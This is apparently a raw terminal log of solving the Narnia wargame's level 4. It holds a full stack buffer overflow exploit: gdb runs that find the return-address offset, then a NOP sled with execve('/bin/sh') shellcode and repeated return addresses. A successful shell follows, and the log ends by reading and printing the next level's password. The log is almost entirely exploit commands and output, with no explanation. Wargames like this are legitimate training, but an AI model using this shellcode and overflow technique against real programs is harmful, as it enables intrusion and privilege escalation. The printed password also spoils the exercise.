(gdb) run $(python -c "print 'a' * 272 + 'bbbb'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /games/narnia/narnia4 $(python -c "print 'a' * 272 + 'bbbb'")

Program received signal SIGSEGV, Segmentation fault.
0x62626262 in ?? ()
(gdb) x/40x $esp - 276
0xffffd49c: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4ac: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4bc: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4cc: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4dc: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4ec: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd4fc: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd50c: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd51c: 0x61616161  0x61616161  0x61616161  0x61616161
0xffffd52c: 0x61616161  0x61616161  0x61616161  0x61616161

Starting program: /games/narnia/narnia4 $(python -c'print "\x90"*243 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')

Program received signal SIGSEGV, Segmentation fault.
0x9cffffd4 in ?? ()
(gdb) r $(python -c'print "\x90"*242 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /games/narnia/narnia4 $(python -c'print "\x90"*242 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')

Program received signal SIGSEGV, Segmentation fault.
0xd49cffff in ?? ()
(gdb) r $(python -c'print "\x90"*241 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /games/narnia/narnia4 $(python -c'print "\x90"*241 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')

Program received signal SIGSEGV, Segmentation fault.
0xffd49cff in ?? ()
(gdb) r $(python -c'print "\x90"*240 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /games/narnia/narnia4 $(python -c'print "\x90"*240 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')
process 403 is executing new program: /proc/403/exe
/proc/403/exe: Permission denied.
(gdb) q
narnia4@melinda:/narnia$ /games/narnia/narnia4 $(python -c'print "\x90"*240 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x9c\xd4\xff\xff" * 20')
$ cat /etc/narnia_pass/narnia4
cat: /etc/narnia_pass/narnia4: Permission denied
$ cat /etc/narnia_pass/narnia5
faimahchiy

